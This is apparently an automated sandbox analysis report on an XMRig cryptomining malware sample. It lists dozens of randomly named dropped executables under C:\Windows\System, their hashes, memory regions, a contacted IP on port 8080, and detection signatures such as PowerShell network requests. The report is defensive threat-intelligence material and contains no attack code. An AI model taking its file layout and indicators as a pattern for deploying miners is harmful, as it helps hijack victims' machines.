C:\Windows\System\HyPOgux.exe

C:\Windows\System\PvstRBE.exe

C:\Windows\System\PvstRBE.exe

C:\Windows\System\HKYMJWU.exe

C:\Windows\System\HKYMJWU.exe

C:\Windows\System\qVDbvdB.exe

C:\Windows\System\qVDbvdB.exe

C:\Windows\System\PoNMFxb.exe

C:\Windows\System\PoNMFxb.exe

C:\Windows\System\GzXNNgW.exe

C:\Windows\System\GzXNNgW.exe

C:\Windows\System\iQmfrbv.exe

C:\Windows\System\iQmfrbv.exe

C:\Windows\System\LcAoqwY.exe

C:\Windows\System\LcAoqwY.exe

C:\Windows\System\lKycHHj.exe

C:\Windows\System\lKycHHj.exe

C:\Windows\System\gILQJlT.exe

C:\Windows\System\gILQJlT.exe

C:\Windows\System\rPyKvNN.exe

C:\Windows\System\rPyKvNN.exe

C:\Windows\System\rhrvNAF.exe

C:\Windows\System\rhrvNAF.exe

C:\Windows\System\IqYrmnF.exe

C:\Windows\System\IqYrmnF.exe

C:\Windows\System\SxPxneL.exe

C:\Windows\System\SxPxneL.exe

C:\Windows\System\hbdzztt.exe

C:\Windows\System\hbdzztt.exe

C:\Windows\System\tsvWPTR.exe

C:\Windows\System\tsvWPTR.exe

C:\Windows\System\excfrvZ.exe

C:\Windows\System\excfrvZ.exe

C:\Windows\System\ftPqIgm.exe

C:\Windows\System\ftPqIgm.exe

C:\Windows\System\aOXKAzJ.exe

C:\Windows\System\aOXKAzJ.exe

C:\Windows\System\aKtPKCM.exe

C:\Windows\System\aKtPKCM.exe

C:\Windows\System\dZohPKB.exe

C:\Windows\System\dZohPKB.exe

C:\Windows\System\gpzPQzl.exe

C:\Windows\System\gpzPQzl.exe

C:\Windows\System\glLHGeg.exe

C:\Windows\System\glLHGeg.exe

C:\Windows\System\HoYINBJ.exe

C:\Windows\System\HoYINBJ.exe

C:\Windows\System\wbwfKlh.exe

C:\Windows\System\wbwfKlh.exe

C:\Windows\System\GGNNYDn.exe

C:\Windows\System\GGNNYDn.exe

C:\Windows\System\IOXtHej.exe

C:\Windows\System\IOXtHej.exe

C:\Windows\System\KHWsZmp.exe

C:\Windows\System\KHWsZmp.exe

C:\Windows\System\piQnoNP.exe

C:\Windows\System\piQnoNP.exe

C:\Windows\System\rhjjnOC.exe

C:\Windows\System\rhjjnOC.exe

C:\Windows\System\fsWnJAE.exe

C:\Windows\System\fsWnJAE.exe

C:\Windows\System\NnwDOJA.exe

C:\Windows\System\NnwDOJA.exe

C:\Windows\System\yKkUawV.exe

C:\Windows\System\yKkUawV.exe

C:\Windows\System\GlKSjqP.exe

C:\Windows\System\GlKSjqP.exe

C:\Windows\System\zWxFsHO.exe

C:\Windows\System\zWxFsHO.exe

C:\Windows\System\geepzBK.exe

C:\Windows\System\geepzBK.exe

C:\Windows\System\CwGhliR.exe

C:\Windows\System\CwGhliR.exe

C:\Windows\System\pwEbiHg.exe

C:\Windows\System\pwEbiHg.exe

C:\Windows\System\xuYPmqv.exe

C:\Windows\System\xuYPmqv.exe

C:\Windows\System\hHcYLWL.exe

C:\Windows\System\hHcYLWL.exe

C:\Windows\System\hVYOXBf.exe

C:\Windows\System\hVYOXBf.exe

C:\Windows\System\NPCfJRA.exe

C:\Windows\System\NPCfJRA.exe

C:\Windows\System\zOGoweg.exe

C:\Windows\System\zOGoweg.exe

C:\Windows\System\VAUBtnU.exe

C:\Windows\System\VAUBtnU.exe

C:\Windows\System\UXwAKKz.exe

C:\Windows\System\UXwAKKz.exe

C:\Windows\System\ijuUXyJ.exe

C:\Windows\System\ijuUXyJ.exe

C:\Windows\System\fHzNEUS.exe

C:\Windows\System\fHzNEUS.exe

C:\Windows\System\vmmBDAO.exe

C:\Windows\System\vmmBDAO.exe

C:\Windows\System\pvMiPVt.exe

C:\Windows\System\pvMiPVt.exe

C:\Windows\System\NjrOTdE.exe

C:\Windows\System\NjrOTdE.exe

C:\Windows\System\tpXYVoH.exe

C:\Windows\System\tpXYVoH.exe

C:\Windows\System\fsPTHkl.exe

C:\Windows\System\fsPTHkl.exe

C:\Windows\System\aruKGdh.exe

C:\Windows\System\aruKGdh.exe

C:\Windows\System\kuOjhaN.exe

C:\Windows\System\kuOjhaN.exe

C:\Windows\System\boorHDu.exe

C:\Windows\System\boorHDu.exe

C:\Windows\System\SEDWxLs.exe

C:\Windows\System\SEDWxLs.exe

C:\Windows\System\WSRTHEZ.exe

C:\Windows\System\WSRTHEZ.exe

C:\Windows\System\NhwwXVH.exe

C:\Windows\System\NhwwXVH.exe

C:\Windows\System\pAllgHd.exe

C:\Windows\System\pAllgHd.exe

C:\Windows\System\omdEwCh.exe

C:\Windows\System\omdEwCh.exe

C:\Windows\System\FbbhSuc.exe

C:\Windows\System\FbbhSuc.exe

C:\Windows\System\dEdVWsr.exe

C:\Windows\System\dEdVWsr.exe

C:\Windows\System\JfssEbs.exe

C:\Windows\System\JfssEbs.exe

C:\Windows\System\XJbtQGf.exe

C:\Windows\System\XJbtQGf.exe

C:\Windows\System\PqHHftM.exe

C:\Windows\System\PqHHftM.exe

C:\Windows\System\PfZzwpg.exe

C:\Windows\System\PfZzwpg.exe

C:\Windows\System\KBNdPZV.exe

C:\Windows\System\KBNdPZV.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/1600-0-0x000000013F900000-0x000000013FCF2000-memory.dmp

memory/1600-32-0x0000000002AB0000-0x0000000002EA2000-memory.dmp

\Windows\system\AMxfcae.exe

MD5 309d093c64952652b8cc000c482489d6
SHA1 2308c0125a335066e599d36068515bdd90289b1b
SHA256 5ddba7d54c073a53466beafd8201585524cc48e224467b0198eedd82380a9791
SHA512 84e74205e40995e48f85a2a78dc61f6e886b8487d8a4bb5ead2360d6fbfb1ea09b758f515e9f0d51e9765c7f9ee4361b9def2ee79886af539012904913902aef

C:\Windows\system\OBXtOmz.exe

MD5 2c07d72d285c0cf1f2d7f67af649d698
SHA1 f81090e195b2c743acc588fc74d46805a8be4c59
SHA256 7effbedb554e5e5155c86d65077af51ac3d1674900173b422143dc7ad5ebdb68
SHA512 92185bd2cfac50d70d86dc14853cbbd210d1a531747f13a7e08f545b5b6e1863c980bddeb6c37a350df9d32d5e8226158c3c8210fc9ac7f7cca240e2d55a1568

\Windows\system\EPsJjaV.exe

MD5 59b09e20c47a8e46562516ce05c0434b
SHA1 3e2471584901d944935168185be497a458358355
SHA256 24d9de520b0a4235d03d1a5f8f9bfcfb9499ba33a3c13a25249b8112a3779080
SHA512 447af0fcd20cc0e93607a150b236dd03c5badc0a18a51c792117f59769749e8dc322a06af4b304d8e474c68e6169ed1258454b8ebbd405aafb4c58d1b98b3102

\Windows\system\oeTuQMk.exe

MD5 0e66bc536ccf379810c23f2ee2a22b1a
SHA1 c4b1d0f48d44b5c802746b82eda1c79ac6c2c513
SHA256 6e936d4ae398c97e208f46622644826509504090219b5437b477f7a440be9705
SHA512 a55d3932bacfe5c62672702762f99a241b433d5d7d37d4bd7bcdca1391b4446e1f3d9dd3a9b4cfb348981d5c51672dd7d5068818c0a75a542775b9543b5a020e

C:\Windows\system\tcVDcoQ.exe

MD5 23752042ad9cb635e96b8adc86b2358d
SHA1 f9e9fcd850779c26aaa7f0b52a047eaf80594e73
SHA256 535899709709925f567f43bf7b8587b42eaa4f664f15cb2ee84d44d16f28f068
SHA512 c925520c1bec3ec3f7ae3d1e16265d3e8f03c1f3bb0a37c8f71c9432c501f01dc51484b4d2649c9591e67d598640b5efe571513d4256cc74f4306a672a2fac4b

\Windows\system\qdhsgRZ.exe

MD5 84a7debbd5b597b0e7c69875ea541aad
SHA1 54a17d1f01fcbb7125da578a78d004f1a5ab57d4
SHA256 8d554faa365c59628341181ec6ca1ac91f9b8a84c757767b29a0d2c348257551
SHA512 1c3023a226c7d0d43851c20de997a473ab88aae1e3646ba194656b9d47d30a26ea2640779e4a8240c3f813c244906aad1b113d216982611e0f45a93d8abd8ef0

C:\Windows\system\EnBLHui.exe

MD5 07cb81817d29db3346e0551997adb659
SHA1 143219b9f7c959fdc5d0e9441fa0aca95629a10f
SHA256 f2c26e1ef115254540df64d2e7c5a40398c70ea35c922ac8899ca9886a7c8317
SHA512 2dfcdccdf717bab4bb947cedc0787788a8d4225a966be637914b790c7bd27ca75b6258bf3596d508da7eb1d372f18aa6664cd8a76c1e237ceffad93104ac88c9

C:\Windows\system\GkOisHl.exe

MD5 c678dcdc6d8c5953651d752dbb5536cb
SHA1 84a4c925caade9ca6b19aaed0852cd23f8940712
SHA256 e285db8829c1262a75bd78cf49e75b9ea3bbf583cc8b29b34838277d3a170f9d
SHA512 237e2f923a6769cc6ea49d68f186ae2d378b6e99af67afe94e28dea585710d7b1a4bdd519641630c743138d8d27fc15956d3631c88b5cb8375b70082ba966a8d

C:\Windows\system\ETcnPOG.exe

MD5 2e014fa6b28d9464a69b9bdde44a2051
SHA1 56719bd2218fd0365430596a0d3e3db4c5900bfc
SHA256 ca34532621c5633dfc2a64f7c37cb1405bad59bbaacfb58b8f0ce5ff32f8b1ed
SHA512 fafd54dc9d3951b1f937d51fe90b00d26881571cb2d8f97792b130672e400881e9ce95d7ebd82d3eee8112e3e706eade781bd8b64766f04c8db8bf38242c882f

C:\Windows\system\NkIPqEY.exe

MD5 2ec09c55867577e2d7d2e39a4ae2b7cd
SHA1 6bebe254240299108ceff815638945d9f8c3e031
SHA256 0244dacd855ad675140f4e95032d734e7a329c694f37734b98fbf263408eccc6
SHA512 86613d3aba03c4fd180edb8d2438cfb23a014a0b29976eaf45728dd601ee3ef52e363158d1ac602708df5e65878417ae49e497449f9b5a49abecc10b7bf93b33

memory/2752-165-0x0000000002800000-0x0000000002808000-memory.dmp

C:\Windows\system\BUeDGoz.exe

MD5 ac438cee2fe45ac8e3366c5fd590b131
SHA1 4bb30e26f8d21a5e8e731b71fbb2931f179d5f10
SHA256 7d587fb0229f45234d4a7e04cf4ac408dd3071b43af55c47087dee1f66f36340
SHA512 22e1b1bdccc5a28a2350d82be293389a4aed29b46a29263593518156c7a0f9b420a348b7c985154ae8ef9307a2f17942d59988bf43cc11e570a24fa99129a347

C:\Windows\system\YqCPLyS.exe

MD5 76c8b8fa343f6f187103afa518de14c1
SHA1 6e8a9d9e60f1259386b62cffc177dd33673c8c37
SHA256 78af4442a8bbf5bd748fd9f0e6540b58d064cadc7c4d465ef97c55e622c56203
SHA512 1d82451cc7c708a6b8c1526f5cc4db2017752f6e8bb45bb023b0d7454b7366950fa55493cfeafdaf4a281f0dbbd1731df87dec2d2f2b4adf85622f3adad2d503

C:\Windows\system\KQQYbkt.exe

MD5 c5daa213f81b06f6c8cf0c2ca77edd9a
SHA1 377c708046eb461662adc76d36a51fb2f7ea34e8
SHA256 0947af65e06cabb354f9301d1848758012c203657bc4c87c27444e1525393ad9
SHA512 115af8ea65ad00621843c158b19caa345aaae9c603c5ace715443308918b36a0ba8599e2f2ff33e6b31ef0e9f2b8a27aba1be90585538291005b38a2ad4efeb2

C:\Windows\system\dnutkiA.exe

MD5 71cde6a6fbc62be744b1f65cd85f1bed
SHA1 ec2f3085c2f3c6e16e0e283562fbe55bc064f50b
SHA256 ba772918b79384ce352dc33418e117e3a52431baa747c153eb6ac8785b78f9db
SHA512 62772135cc232d6fdf1603eec1660b0740568fec0b2dab3fb54bf3a62a8435266eacef276ff51a85d7e3132456f17cdbba3fb182aa09656fa0120063057a94ce

C:\Windows\system\shQLvWE.exe

MD5 7bb409aa83db4c384e1ad29c39d520bb
SHA1 88ed455ec0c5e7521fa54b4630247f62d22f1066
SHA256 d6e489b96ac1bcffce8a27725c2055188eb75d8309ebbef23caaac406f5e58be
SHA512 76c785f25dd529af36b3fb96bf926886acd59f151d3f80ab2d57c2442581d1b91ca97640eae34a133e7befe04ea3aea3f7b721dea235bf451ef315688c7206f4

\Windows\system\ufOpfGC.exe

MD5 d2bab81411e5386e7d0508c3f11ce7e5
SHA1 6ba2751899079b5caef2f53b23b151848bbc6324
SHA256 717ce8ebe356d811db332f155ef9295cbdecad7d6f4c29bda8142acfb3ff700e
SHA512 a290b850838c34e512d17117aaa589bc237e7eae537bdf4497c01f6eadaa29b93b153d24d36ad5d337582288eaa1eef0467802a1a06125047155d3457d0b4fe5

\Windows\system\GzLIxKC.exe

MD5 153dfce7fc417a9e461f475c547a7b81
SHA1 d33698c525c057955b9a2524dff7ce3b611f64b1
SHA256 97b95bdef736c5389ebcf3963b2ffa1e6ff56cf0c52f9c62b4c7c88d9944f6f0
SHA512 bf6935121550ab338410ff53648b8b315c9098d410d1aab1354e0aab56c7ee40f4871adb641299dc0254e705738598764779d79b7df9ef2cd937e3345e9b781e

\Windows\system\BWtVrYg.exe

MD5 46642fc8f5eafb664c735a3870ef1ee3
SHA1 5de476381e6d72ab9e4bf2cefbee8dcc9a4b1182
SHA256 837b2587c3475db8e39400440a0ce7e9c101d80669f261d0b4ce5bad4aaa4020
SHA512 2d140bdf2e2f3f755a93c50fd74b26e51fc0bce56c6ff16a079e843c9664ff8c0d5f4070be1c6ec3737a2ea0a92d57e4bac288b43b289fe56343e9e1afc8f2f6

memory/3020-124-0x000000013F8F0000-0x000000013FCE2000-memory.dmp

\Windows\system\PwOMdqU.exe

MD5 3bee7007e678c3c904106232efa614a8
SHA1 1475cdc559b1b88c1b587ca0c2e7935dc34e3c10
SHA256 7f00bd4c1c2f8ca687c161f16999565bd473d31f864d0a15891e46e85021c21c
SHA512 1e251f02a541f9038210459619c5309348c6308dc2edce5ac0984c2f414411e43ff0978680342849433395013da08a141bb41858340d168b439c389eccfb8787

memory/2620-110-0x000000013F130000-0x000000013F522000-memory.dmp

memory/1600-109-0x000000013FE90000-0x0000000140282000-memory.dmp

memory/1600-108-0x0000000003030000-0x0000000003422000-memory.dmp

memory/1600-107-0x0000000003030000-0x0000000003422000-memory.dmp

memory/1600-105-0x000000013FD00000-0x00000001400F2000-memory.dmp

memory/1600-104-0x000000013F480000-0x000000013F872000-memory.dmp

memory/1600-103-0x0000000003030000-0x0000000003422000-memory.dmp

memory/1600-101-0x0000000003030000-0x0000000003422000-memory.dmp

memory/1988-100-0x000000013F050000-0x000000013F442000-memory.dmp

memory/2840-99-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2352-98-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2572-96-0x000000013F590000-0x000000013F982000-memory.dmp

memory/1600-95-0x0000000003030000-0x0000000003422000-memory.dmp

memory/2752-94-0x000000001B590000-0x000000001B872000-memory.dmp

memory/1600-93-0x000000013F050000-0x000000013F442000-memory.dmp

memory/1600-92-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/1600-91-0x000000013F070000-0x000000013F462000-memory.dmp

memory/1600-89-0x000000013F130000-0x000000013F522000-memory.dmp

memory/1600-88-0x0000000003030000-0x0000000003422000-memory.dmp

C:\Windows\system\EMAWpwV.exe

MD5 739a75581f8527e2e8b50d2e645c4307
SHA1 405e699f110e2f6efec3d459da712210dd7454df
SHA256 a1da332be86d6bd896e74a3a944bd412b07df9c766fe7e29135ff259f954aee7
SHA512 da0a023fa9ab7a2b3adf465fba0389821d6c1dbb1cbd820feeb6c1e8e0b408ab797bc2891597b891a966b789ae26f5c9306aebffb9aedeaad16385dd6f8f9f77

C:\Windows\system\MqkecDl.exe

MD5 27c3e63f9e3c6cd57b7a68ec3081f728
SHA1 89fa9c7d96fa4906c035507c513ab4a8dfb9b1a6
SHA256 4f6fc44303b0df1680dbf9334c5f0745078039c648ac8e023d83ac49678f3121
SHA512 e8b13031fc526bf3a71d2e7166f11d635a3f468648f1d66921a5c7484e91f924fc2ca0a9e19e09ec6ebf9a81accff5d8ad659cadfbbefeb1363e7358ee0f572b

C:\Windows\system\vtoJjFe.exe

MD5 c5450a1b7b43e958b2ad97c750b0daa4
SHA1 0de84a3e88d9cd344171639daa2960ca890975b3
SHA256 80569b8d1cf9ea4dca789f83011a901902fb3414d1da830f2a724fb8a839a24c
SHA512 e4eca0defd607a81c4a5fa70cedb84f9794d9b180f9fbff131e49fd701c95849b7284d0a7b157c88b433118bb0633a541fb05bcc729fa491567640c1cd95c1c3

memory/2104-74-0x000000013FD60000-0x0000000140152000-memory.dmp

C:\Windows\system\bVtUqHB.exe

MD5 26b071b0b94630eced8fe22966d72817
SHA1 664d17adbd33b920d560d88f6fff19e97dd3361d
SHA256 57160b65169bc4ecb18be78665990c0b5450520570e393e7993a64027943b6d0
SHA512 92c0b7d9e78f7ee562d7fe01f65c3896b1246e9f5002decc7eec9063787c54b955383806aebfc388e6d82451267e418c58babb9c3cdf1df2592f0cda666dca41

C:\Windows\system\QKpojNv.exe

MD5 37fafca61dfc2b6e1da3fcf41b2070d4
SHA1 98d695e5ecdaa08d0f966cc577cd6daaa7341114
SHA256 a527e7bc220f4bc0b9df5d3d630888756d793872309c9fa0009643ef0828b36e
SHA512 554405ab128cf978be712761bd08899a49c033c881c378f459c4a22645168426a4abc8ebb390fc7391490596ea0b834aa3269aeeb99bfe4dcc9d8fa720b88aff

C:\Windows\system\ZQrXklD.exe

MD5 7ff5273667be6d280db05df7d3fab669
SHA1 cf414d8d2a7f83930bb2c3973080a43b29a0e771
SHA256 acfa61970968c5af7e5e511330a5d1aebef5871614d8b3139b3c5e7e60249493
SHA512 d870315d30d5a5882cf17cb4db0e81fb04a9a22a0e955a8262d53bf6ba12a38af1e0193ef7d774b4b124529d02c8e6778c91603d0bf0d937474f0cb7375ece76

C:\Windows\system\LIGHBtG.exe

MD5 9b0f5ab666d96cba614240f1700c8677
SHA1 00ac9884a2f20f479a3c22cdce28743e80ad84d0
SHA256 d28e114bac18c4c439a5fb7f8f9f0467cf1d1d3826c7bf2c5bdbf89c74661b48
SHA512 2966f5fc766c6b43b95af4d86ad0d92fd5220feff7c2884569ac1dcf769347c00d7d0ea4794e4539127b839f5c80fbc5e89e11694901527fc1eb8a31d99a85e3

C:\Windows\system\FqhLzMz.exe

MD5 b89d531f685c833c7964556d1381e528
SHA1 b0d704d7f9a9c07799a39c1fcb0823333864a7b0
SHA256 e211532da9a2f1bede74a7f81da762ea50b68f4070714ed2370109e0d0f8ce86
SHA512 9684777afd926e09faa97d558571da472e05042b17b10cc9c9369afd5f976bd354e3a2389fdd18984978f11ee80574d9b038b1702d6e2b7a60d0044a3c3bbdfc

C:\Windows\system\BVNhYjx.exe

MD5 1cd5fa6b18275d5c0271a2d179b38e0d
SHA1 f9dd59744f11d3c59c1c40d0d156a553f57caef3
SHA256 177108d5ef424dc25aef5e3320a0514c26c5e78ef55a4235bfedb8b7a77f3474
SHA512 4ca20ce4f07a8e3b5c221d0693bc37d334d220c48054cdd8404f535a6df43c6116d3b8954ba6cfb647798bed838acc8a110f95f8e10c147ba33b3bd18944da69

C:\Windows\system\vzkpmHb.exe

MD5 bf188ffc8e3aa10cada0ef2600e014cf
SHA1 77d42d7aea06fc15038a67bfb9e99a3504ceb1c7
SHA256 85731fb58a7a4345e4ed5cc4f7f0d684c4fdc9053f215905a9608b8b7d9bf6fe
SHA512 72f8b7e993b858c45763355a70340614507c55ec6156f4d56a0ab086469c4c591e538142c9c13eeb1c3b2368cad5f48d41e98ec7f6fb5ecf56ab607b8700aefd

C:\Windows\system\oueWjMz.exe

MD5 5f5c41678d0f6fa1e1ce6af19fe08b34
SHA1 d0fba8d6eafc53309710cdf88cc479f135bb93d8
SHA256 52ceff4b92d2fee43eac3801be98765480550ac06be48343ccbddcf7ccd598ae
SHA512 fa59512c0cb5a5490194e1d7238a981c9454fbde671de1e3edbfcec8c6d6aeba18ac1d20f404d307cafbfa006cf93e396cf5ea38fbed67e348e1b3201b31da07

C:\Windows\system\vUqXqTJ.exe

MD5 53e57019d16a9e026748603ee528f65c
SHA1 3bf4877106d3b749cb643091a2a04d1b4b030c13
SHA256 c7c2cc9387e7245bd2a798f883a410a6d50b59de974b79306570d46e6ca46e0f
SHA512 2709430f245d824c5716383c28133f8789574e8689945462ba4663f991b7eb7cf1e2db0da966d9263f09940eb4896623253c71aa0ca1d54bff4614aaa22b0f50

C:\Windows\system\gwDhgEH.exe

MD5 62d945584e7588e7754f9f1a9a0d54b1
SHA1 8807e6dac9858ec4a44985a74f4e945d785dd98f
SHA256 d997c79a43f553fa46f6eae790b75722b08e35c9b1b630413e3b05ba0926506b
SHA512 65dc54b940004c134b0bf8d6f155c0d0be08acced09d13375a6459053cee2ba6a69ea5902aed5ade12556e837df5336d156fdaf367f01b5203d461cd0f8aa59b

memory/1600-1-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/1988-4735-0x000000013F050000-0x000000013F442000-memory.dmp

memory/2352-5222-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2840-5224-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2572-5229-0x000000013F590000-0x000000013F982000-memory.dmp

memory/2104-5293-0x000000013FD60000-0x0000000140152000-memory.dmp

memory/2620-5378-0x000000013F130000-0x000000013F522000-memory.dmp

memory/3020-5231-0x000000013F8F0000-0x000000013FCE2000-memory.dmp

memory/1600-8075-0x000000013F900000-0x000000013FCF2000-memory.dmp

memory/1600-8682-0x000000013FD60000-0x0000000140152000-memory.dmp

memory/1600-8787-0x0000000003030000-0x0000000003422000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 16:12

Reported

2024-06-10 16:15

Platform

win10v2004-20240426-en

Max time kernel

92s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\fmDrabk.exe N/A
N/A N/A C:\Windows\System\EGniESX.exe N/A
N/A N/A C:\Windows\System\hMnTExN.exe N/A
N/A N/A C:\Windows\System\qlkmZUM.exe N/A
N/A N/A C:\Windows\System\FyTQrDl.exe N/A
N/A N/A C:\Windows\System\YuWxLpO.exe N/A
N/A N/A C:\Windows\System\oITwYhe.exe N/A
N/A N/A C:\Windows\System\lSqNBUj.exe N/A
N/A N/A C:\Windows\System\AwUdIrx.exe N/A
N/A N/A C:\Windows\System\vNLqBmi.exe N/A
N/A N/A C:\Windows\System\Bodjjga.exe N/A
N/A N/A C:\Windows\System\mWucDFa.exe N/A
N/A N/A C:\Windows\System\vJIYnYD.exe N/A
N/A N/A C:\Windows\System\BSXNdRL.exe N/A
N/A N/A C:\Windows\System\EwiKSdj.exe N/A
N/A N/A C:\Windows\System\rbhPyWt.exe N/A
N/A N/A C:\Windows\System\ElJtHMd.exe N/A
N/A N/A C:\Windows\System\DkeKZUw.exe N/A
N/A N/A C:\Windows\System\uSFiJCd.exe N/A
N/A N/A C:\Windows\System\tDKWYLE.exe N/A
N/A N/A C:\Windows\System\hFSSyao.exe N/A
N/A N/A C:\Windows\System\PWKYJpE.exe N/A
N/A N/A C:\Windows\System\KLbocAj.exe N/A
N/A N/A C:\Windows\System\hnseAjG.exe N/A
N/A N/A C:\Windows\System\IjWotQK.exe N/A
N/A N/A C:\Windows\System\cfCTZzd.exe N/A
N/A N/A C:\Windows\System\cSbJYQK.exe N/A
N/A N/A C:\Windows\System\yceiviu.exe N/A
N/A N/A C:\Windows\System\DfuLVmz.exe N/A
N/A N/A C:\Windows\System\OcvEpdF.exe N/A
N/A N/A C:\Windows\System\WnTtJXd.exe N/A
N/A N/A C:\Windows\System\FmDxtYy.exe N/A
N/A N/A C:\Windows\System\GLKYDUy.exe N/A
N/A N/A C:\Windows\System\vbarNiV.exe N/A
N/A N/A C:\Windows\System\IJqrwCk.exe N/A
N/A N/A C:\Windows\System\pwRCycX.exe N/A
N/A N/A C:\Windows\System\aULfhCU.exe N/A
N/A N/A C:\Windows\System\KpADIXF.exe N/A
N/A N/A C:\Windows\System\MIfTYNX.exe N/A
N/A N/A C:\Windows\System\WZyiqEj.exe N/A
N/A N/A C:\Windows\System\uQdxbyw.exe N/A
N/A N/A C:\Windows\System\TomqBct.exe N/A
N/A N/A C:\Windows\System\WZHLmGA.exe N/A
N/A N/A C:\Windows\System\RAkdGkY.exe N/A
N/A N/A C:\Windows\System\aAMMICG.exe N/A
N/A N/A C:\Windows\System\NwYVyYl.exe N/A
N/A N/A C:\Windows\System\WZdxOjc.exe N/A
N/A N/A C:\Windows\System\MZhfXcq.exe N/A
N/A N/A C:\Windows\System\AJgResJ.exe N/A
N/A N/A C:\Windows\System\DFnRdec.exe N/A
N/A N/A C:\Windows\System\AVObxZv.exe N/A
N/A N/A C:\Windows\System\PKQGYPe.exe N/A
N/A N/A C:\Windows\System\hCRPYpA.exe N/A
N/A N/A C:\Windows\System\XMbxkup.exe N/A
N/A N/A C:\Windows\System\CVIpoHQ.exe N/A
N/A N/A C:\Windows\System\FYiKbhu.exe N/A
N/A N/A C:\Windows\System\htWsWLv.exe N/A
N/A N/A C:\Windows\System\HwDhwAk.exe N/A
